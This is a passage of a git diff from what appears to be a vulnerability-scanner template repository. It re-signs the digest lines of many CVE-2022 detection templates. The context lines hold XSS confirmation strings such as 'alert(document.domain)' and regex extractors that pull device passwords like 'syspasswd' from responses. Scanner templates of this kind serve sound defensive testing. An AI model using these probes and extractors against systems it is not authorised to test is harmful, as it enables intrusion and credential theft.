4b0a00483046022100813a074dda781c0eac1c568a26f0ba914c29ec80c80fa7735148e7af57dc3cd0022100ec9b4331c556899825042e75cb937f5db6dd4b0c2a8166e17e3d466a2ac11256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index 27911724e1..ec141727a6 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success\"}")' condition: and -# digest: 490a0046304402201c4e60b074ac073a47975a8d5098836fb4c229bc87513c05560b4e47c9b4a51d02201ce26a4554f2a66d0e4c8b00935d1587d66475498c0f538584c8099e981a9a46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009fa6f232ca381fb48226af4f083b029784580c4493e408d9152aa86b7fb5ba5b022100d094117a170ce4c1655d880e71f71e166a758c6e334fc23ea1ff6d7bdfc16bd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index 500501c96a..3c709a5b58 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success\"}")' condition: and -# digest: 4a0a00473045022100a3ea459a9ffb2cfecef3b00300e5e65a75669bec415a481218447c92d129345402203e0b8a16ac80e4fb7948d2c418a4745685d3d2b8b3e29760b858effcf3b864e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d2966f5956585a0efaed31f9b22d39292f964f765ebb98c246982f0c551f5e5602206febf87ebf0b52ed1758f4d39e21b4a8cabf1a463fb7ae53ff7db96e83e7b2bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml index 2b627f8a44..e39d07ae88 100644 --- a/http/cves/2022/CVE-2022-31981.yaml +++ b/http/cves/2022/CVE-2022-31981.yaml @@ -42,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Control Teams")' condition: and -# digest: 4a0a00473045022100d2b77265247a844a543151ac19f0fe136cefd62457e9c581791c7336c9fa50b002200fc31e19654ac1e011b7104483458e1e4e86216cb0c341d0833cf50fce833ce1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d65b2d7292abe523b4dc1d6438eaab7a214662256779f7eb3c0bb76b8747d5e50220050bf41ca7a3b23c0054e85bf5aa2bf734b36b2a69ec82c38a61e68fc2d507d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31983.yaml b/http/cves/2022/CVE-2022-31983.yaml index 37e248af3b..71c27b9277 100644 --- a/http/cves/2022/CVE-2022-31983.yaml +++ b/http/cves/2022/CVE-2022-31983.yaml @@ -44,4 +44,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Request Detail")' condition: and -# digest: 4a0a00473045022100dda1b407e3946a8d08dfe8a4da98bf95b77bfae535eb9499bc7f8d5cb0a06d740220401b92b24b02946161684222dbac0c6812a97c86916ab5ccdaffcd491809fcde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204af8863950057b32e9684b9023e7884d1a76824a27e8591e296376788d9565e302202866cbbcb967e8a82db30b5e44ca11175311f2f73222aa124aafe5a17f3f4069:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index a4aa7c052e..82fb4784f2 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c27b0c9f46ef199d8a55356b8e1c6b8e6d55e3e55a7328af4b676cf6d33f3be502205b712981499f0d873739591c3fe20fba293ffe5b84d29e3fe4d229bbbb989a2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220389add9cc6b1a640e2282894dbc596ff61dffa9a00cc8035e534238d115157c6022100de0abc2017d0e7c41ec520e3e0093879ae26f9d21fc1a65624111024ad5f0ca8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32015.yaml b/http/cves/2022/CVE-2022-32015.yaml index 2a6425936c..d85ed636e1 100644 --- a/http/cves/2022/CVE-2022-32015.yaml +++ b/http/cves/2022/CVE-2022-32015.yaml @@ -39,4 +39,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4b0a00483046022100c34036939ef2413c02af88cb8e86ecd6b3be7f27866b7d0ca21d3b7a269e47a8022100cf88f059ea7f102348f18a69cc9b78e11fc69e56a09b123e5a590fee4b261619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085cb8c9286ed2f082b2d94a0fac1db9a1a72bde17b1993612daabea94ed932e102207a5b3fa79fc645f8a7eb241015e6c629e6da56d56d1232a311985e5c86a08baa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml index 5ec3f75e1f..32de97c276 100644 --- a/http/cves/2022/CVE-2022-32018.yaml +++ b/http/cves/2022/CVE-2022-32018.yaml @@ -41,4 +41,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4a0a0047304502205ba4dd1e28ba762599b6a5ab360d76fec10ab36095eea39b5350f66c6ccfdd4a022100e512574c97e4dd07fb068fe1ad699e8401d927211f5932a38f70608192d06c77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220274e1c830c446e7ad458aa58b4574b603243d7e4a6bf1a021cd176736e3d5d190220403b0f84d5c64361bfd093fd9213351f4d03ad12b6d023ee595239f95da8a149:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index ded26d3ae3..6bd1441b08 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220725a329ba41785dd96c0939334b9a1e78af7fa6421aeef4df6d2dd933c44115c0220351e53b8bd40ec2dea1271b2162432124266cbf982ff3f9fc1eaf8903b8207ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b573b3b71a7368accdd53e018b719df433191e3455776ebaffe52024e416174c022100c17877e7ed7d322bee3f8e60160f7600bd95ab237a13dc8834c2bd7ab21bfc09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index fc46e42229..725eae45a2 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203b4e45ad6997926ec06328175be051f4173ad99349811ce498ebfabf77cfadec022100ebd9ee62670283e68f73cff5756332ebb4f4b7d010c5a102bcdfa61f6967c540:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ecf76af5f39d77161eb9d6918babcf47989dc5727e90b38ed4e25be094f7281022100abc7ded4a7f3b083fa662c8c22e9f0440dfe931fc3be6c4d379573d51600f7c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index 578029f2fa..4783617bb6 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220566cc50ee5f50c4a96f3e96207530f5e6f169affed02f065aecacbfec179891302202c5e77606826ec2964e65a363ae6cb5339c0746c36c2faf2c312ebba75307610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b2d5cb85142b1144dd6054bb80870e446047c7b799b4be0d47acb34650d3cdf802200cd5e9859ed165bfbb7060c1273bf8aabe4878bf80ba40cd9cbf3e80a5171ea1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index defbacfc5e..1bebc48cda 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202d8d1ce0a8afb0fd0d8764c020301f0bed489c76f1e00e810d5e77dcb9065adb0220745a0985676455f645e3f98ac502002ec5c0ee377c9822b23ec2081b0c2bfd3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f8ecc7eb539922392b444de3befc31151565d5d517fe639b2d39dfe287bfa519022021858fc6ea793ea95aca5f933240ee25abeb4170f9f7c2665fe4dfc49fdd3cb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index 0abfa87623..ce53554b2b 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100df821f457de97d0880a4be9f79b9a08294cffaaf8b36b5f573415af2fcc073ec022100c1bf7e95967be2f3096198251b61f794654b302d661afc789ad82c93f886f2e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c7362dc0ba41b772a9b4f7585fe264baa1f4ac8578c12a222c6e85338c1b083802210086735ba9741b4a1e16e0ca1c0e9ac07f6f8cd91b47bb20ecb94ebeefab395b3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml index 38aa8ee5c5..49fc8166af 100644 --- a/http/cves/2022/CVE-2022-32094.yaml +++ b/http/cves/2022/CVE-2022-32094.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210084fb69c1a03081213ac49cd95c8961662947511ae874b68981e489142096f3a3022100bc20375d33139ca01dac35f08cfcf15bd4ebd45605b6e478d37fd6fb506091ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fa5469052f4e8056be48d8c05c1e4309238d8b8316ad85a2fe4a798ed340f827022100e86c33434fcea45477a25840c43d0fdd301dbc3a308aa1c0a3d9b95134e6cb33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index 60b8b5b9f5..c56b304eae 100644 --- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d1e44091a63188927cbb7a9f6b8d42e7480fcfe75384863173fdee98142046c002210080ce0e4cfa487b2b08f8891139e605f8293b0b80a4250b609f1c9ff37505ffb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202fd1ae689fa8bb866a05272347f286b107487d47b90ae3435d75afd61a2f1bc502200d01e3f31f6a1964ea58452533684db62f413c6a080a8b638769d09d1a1bc1ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index 48846eef9c..fcbe967b91 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022072e312e8df1571351e7a21ca6317934960724f0071495fe4169ca5b013300dcd022100cc5ac2a8a33a0acc037a5db55a65ebb9f5ae1937caac9aededb4a8a59ab3ec56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200cdd4318d7c194aab2715822710f278ab82b1651453ebb3d4fa447815c8ac0420220108b44251c0d6176d3b3045e9d38ede9a7cce2af1db1f24d9018e82017746b9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3242.yaml b/http/cves/2022/CVE-2022-3242.yaml index 4705c7210a..89c31aba06 100644 --- a/http/cves/2022/CVE-2022-3242.yaml +++ b/http/cves/2022/CVE-2022-3242.yaml @@ -40,4 +40,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "") && contains(tolower(body), "microweber")' condition: and -# digest: 490a00463044022049539640dca818e246d16d9d5c7e24b3499600ed18ff1d74a3608b845d89688102207932b2ed5c81f7a4c34b58c4da1de8032eb2e0c1920be395f0b14d309d69293b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206fbc6363a21e215c4088ba1c478b277a020ccfd4743bb1fd653ac8ea2b22dee10220223560bfe8904b8edcc45c1702c6f885c1c3ea0cd937c8cd5314038cae3d2bd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml index d775902a68..e0d39b9c4b 100644 --- a/http/cves/2022/CVE-2022-32429.yaml +++ b/http/cves/2022/CVE-2022-32429.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f40c78cc0f0a72c1f287552733d6a8029c75a95273b1d2e8e9c7b02c553392850220647bafa53296ecf2b294942dd964b0f8ea4c278bd17ba8b267a8ecc5fad97fea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afc71e48780f00d753b36650ae9376d9ff5d62d05d54b2641dea06b932cddf160220307a30290659da0cc5ebe89a2a93a90d5d7649a83dfa79c8b7d890418c11a6df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32430.yaml b/http/cves/2022/CVE-2022-32430.yaml index 2fc11ed28c..e4572dee99 100644 --- a/http/cves/2022/CVE-2022-32430.yaml +++ b/http/cves/2022/CVE-2022-32430.yaml @@ -59,4 +59,4 @@ http: - 'alert(document.domain)<\"?cmd=') condition: and -# digest: 4a0a00473045022100f0f38f1056959a80fda5a1d4ced07d7ae1ac102a7ba4c692c0b0150a62461f0502205b4da7a44c66b407918128ef1f68b82728505e5d40ef1467678a122bd7212b0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009d3aa75f62ca681d073b7ab892f622924275b4009c67f756924cad1e5daa37f9022014c85f00463e095d3182f81a8b2d169bbc44fc5b9cdca6f68726e085a1bea425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index 575a68ce83..5b8abf2e39 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -58,4 +58,4 @@ http: - '([A-Z0-9a-z]+)<\/sys\.passwd>' - '([a-z]+)<\/sys\.su\.name>' part: body -# digest: 490a0046304402205f3721d4d1cc1bd01d55480d74005f566999d1eb1f7aef883abe68afa60e1d4102202cd3dede0c67c2903cde37b3f54d432dcbb537f4bfb2e29d4ee779cac0609d99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220149f7ca21aac4b71f5a33d4548153c1b0a7c3c100a2b77ed57dc7fc5f96c1cc502204fd7f13d1c37f716696bf4f38e4de79a49ebc1b4588f8b21e6d288698fda9402:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 86cc26f3f5..6e5153487e 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -47,4 +47,4 @@ http: part: body words: - "19833-2202-EVC" -# digest: 4a0a004730450220463f0c1d447513c69079b7f58a07d158405b058efb1e70a43cd3d08ab170875b022100b7e623399aedd2ebfae7b507b9a2b8c756b4a26e4decc54486d72e32770775cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100abc7aa49e5941cb2a9d2ee0de03d8e18d1da55b525d10e20e077160782032d2a022027d0514cc16f81114e92b428ed56360c1b99e06ab3b0ed892fcfa30a348e356a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index 0e4fd8bcb3..855828c20f 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202ae9ccfcd2d44fcb8006ba953a197c97d4ecfacdad1348585abddafee07bb83102204e83d79dbe8ee0856aa30e9d9833f4f2d553fd603b0952a23e5c83d208c62401:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202c7c635fcddb3574cb590e6287bc14534231ea48016d7df139749489a9d39b55022100d44004e450e95e1a53f364391d558635281fbca45027dca2e61e204f9bf30a53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index 08d0ce7a43..5d27da4da4 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220458bd56d4667cfa3e15751e8422d0ba54e709c7e9d7a857053c0307e24cdaa8302205b0be1ac0171f03bb15ec954e402ff2fba222f6711aa86faffac17ebffc02f19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cdd086dd1a17565d574c9530a08fe2b147d4f7395ef1efdf1f9787694640fdaa022100857b6f32081121e52fc813c0523b17c3e3298527dd6932018cacfe32ffbeaba8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index 2efff32f32..435486fe0c 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fb0b8aa54fde332f8cd44ca55dfda68ee8eaad6e9c47f58cd20feb3873a04ac402206045d384f557a00bd359d936396b51e46a94bd70a5ff2e253f622d481a211aab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a34dd1ca95502ddc06425b7db0df2eeadd4152a60791ac939fb1fd11801f83c022100c7e7579fbd0b0c4294066b8f4962dfeed2907abb3699efdaaa7f1b0787549672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index 7de45889d4..7ac287b4bc 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -57,4 +57,4 @@ http: - type: regex regex: - 'syspasswd="(.+?)"' -# digest: 4a0a004730450220012d32e7af94355d9d79d3210f97d2bdf114e7d81c8a425f14611b6898afdcb2022100d2e6dd7fe5b5f462e9bccc0179f3417fa34f94d1006498add8171cba0ec4af4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009190562abaa99ad2a4520a31b3144b2ebc306c30ce72a5c5aed9a44e80629a25022100ed58b7ec72a0fdfc08d0d13b612a2449663ae80cfc83485bfa07d06cb8265947:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index 471a1e56b4..9afab472eb 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -57,4 +57,4 @@ http: - type: regex regex: - 'syspasswd="(.+?)"' -# digest: 4b0a004830460221009d579af2f6d3d5044fff3d3ba8ae41ae23b08238a57030a5aca5ce2e072c848f02210096fb879980b385c7240a0b97b5ed0b21d8a2e4ab835977407c3e156daaece404:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203e386f3a032ed9c40ec34bfc8c0428067801c0681aa3a567fdc3d485453f0fb30221009a49981731cfe6d9203e892924f97cdf84ad1240b81d7cb66bcec31728fce7a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index 21de1b1035..22243be7e6 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220517ca1dce8d4d311ecbc72009be25a53b0ccf3bcc93670f195b5f037608dfef0022100e45d38b599b8695586de222b078c5ebb059c93246d3d687afc08bf6e5710226a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204cf78920462298830f71beb379e86294e94300dd59b67af49df75493b7599cfa022100e80c5a8fec05c3a959799266bee27cbccca63fa16b5466bb5a6232861f435b73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index d132165ace..d6ab2d2988 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fe2b14acc7033ceb8f4865eea336e52f57abfcde0cdd377d01e8350e962bed1d0221008fcfa7a19d5076433d9771e4b486a3e7fe8ff8eb61a72aab3dd5a8320dcbd8d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022057b418327814695f2dde30896d5d929847414387c3e416c53917658d56c4a36e022100f2c689ea06f9aff6d04515404d8fb43dd338049c386513b191816bfb77a749fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34093.yaml b/http/cves/2022/CVE-2022-34093.yaml index bd71b9e337..9b9751eb70 100644 --- a/http/cves/2022/CVE-2022-34093.yaml +++ b/http/cves/2022/CVE-2022-34093.yaml @@ -41,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")' condition: and -# digest: 4a0a00473045022100b6c16f44954588e4bae35bb1d81fb7146230861817ce49f5a3de2f00e70a282a02204ac735c905d496f7e25c3534786304a13f57730db0a36a2c722fa4471bb64fa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d8ab03284ce3101015e6cc8ba6bc61aa1905269e608b9dc08dcabcbd0dfaeb9c02202c7268c78cb7a7c34997055366784ac927cc98a49b4129332cac2acfb03ec527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34094.yaml b/http/cves/2022/CVE-2022-34094.yaml index 26d84ff584..ec8eba166e 100644 --- a/http/cves/2022/CVE-2022-34094.yaml +++ b/http/cves/2022/CVE-2022-34094.yaml @@ -41,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")' condition: and -# digest: 4a0a00473045022100ae011287587c98e490b0c70b0c3ea88250a2b29a79c656693b056f3adbda9acd022035c0bf42383d419c05913b95afad80e3a7bf9eecc3689f24b92069aff39fc3af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f92b564c2b29b540ff7a71e2952bc2a0b88dbe6ec122dc7d33ef9b07171d2e12022100fa211d158d102b4e01860ac1c4a06f9ffea30e427d8f9ee02ae46b16c7fc0ff9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index 6a6add0649..d87d4ea90d 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c5726ce028ac359181e6ce2ccd45251d4715c1c9c936d2ef67b588f2159e7cc9022100c49a6fcb006b5de199ccc32a6d1716a713f8de4f24346ba4578c705b4f225245:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b349fbc017fdba9616a667d7a762c1f50f724c5f91c70a65aa366774b1b44c17022100991acb8def276e72b096d3d82bf30714f276c63f597a3bc6c7a8d081234e4413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34328.yaml b/http/cves/2022/CVE-2022-34328.yaml index e90c595780..8059932da0 100644 --- a/http/cves/2022/CVE-2022-34328.yaml +++ b/http/cves/2022/CVE-2022-34328.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206bde39b421fc0dbe953ff2bb4c4414dd18a118d11c1854e21a49bfefa62df3f2022009445f47a0e787a6922487a2834e6903d60e5f80936db25397d553943d744fc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022048a957ea315cda5158879633e7d1a9b9683968ba1e22c6a01182a9cefda01cb302207357834ea37eeeeda27e521ceb5393dfbeecd41a419d6723744689af5de0eca8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index ad06d8b20c..e6174ed181 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022008737e106e5c8fe1e9e117f6bc57f005c3fb3b9810552455947f1568b74df85a022016b0f75b1b14036e1e8e1ce246588f322c3dbd791bc9db34ffead55bef452f8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207b3bfaf0de960fab463d8540d70b2864984c245fd9e15ebc01e3c417717247c2022100f3b615543eec162a1023a3c7c5853d87123f232f6963c36a974cee8b904a0066:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index 0d7981b750..b69e643396 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220508a25e53992f71a0c0e1613f1df75afea7314115bd57f3048e91c9fc36ddf3802207ce3526546e9caca6a5e12a9b26fc0687f38a8f928ff84e751c99d5677ba4114:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100984a856baae58dc3e147e9b54be9ea0320e1de616dd77a24260ab31d7c960317022036015f3b1574b6389509de757babe634875fb340ea1df10e6cc35ae70731b151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34753.yaml b/http/cves/2022/CVE-2022-34753.yaml index d623bf0f7b..e287a58f1b 100644 --- a/http/cves/2022/CVE-2022-34753.yaml +++ b/http/cves/2022/CVE-2022-34753.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204b51d243c97f21fcb85beb1f317c06aee7975d29df11fb1cee0c2956fe0fd65b02204299ce2ca6106775b89d507ffec1d69bf0c776615de752889c3ebcc81abf06d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200bdce3a51113de9797187207490b4d62655420827c2eeb08473dca4a223fecb702205c18fa71b1a27b1d88d7488fcb1d6e37c59afd91b4126fd896b7ff5a3b483f9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35151.yaml b/http/cves/2022/CVE-2022-35151.yaml index d0a786ab3d..8bfa02f8eb 100644 --- a/http/cves/2022/CVE-2022-35151.yaml +++ b/http/cves/2022/CVE-2022-35151.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ea88299ec85fb50b4a362a8e064bc821fb7715a7759f1eeca4e1cf413f0660ed022100fe6573babba0d9c0edfa96f41ecf1d52e2520195df629fdc83d76427c3b9eef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ce2ffc6a17e3f2b3ddfb651568f839ab45cb0567e2bd94445e09fbed7346238022100b4f5bacb5906cc60494dc7cf4bab91bfe12422698053070bc95a6946c6daea30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-35405.yaml b/http/cves/2022/CVE-2022-35405.yaml index a2ca9e2c53..d0402ebb9e 100644 --- a/http/cves/2022/CVE-2022-35405.yaml +++ b/http/cves/2022/CVE-2022-35405.yaml @@ -61,4 +61,4 @@ http: - "" - "" condition: or -# digest: 4a0a00473045022100c58308205018e15f25ac2f7d5c893f96e4824a583109c18b69b936c1d0a70a2b022071a1f6412c2a7b759bc7b80ca525682bca892b4f239f9c1dd42aa27dafc7221e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 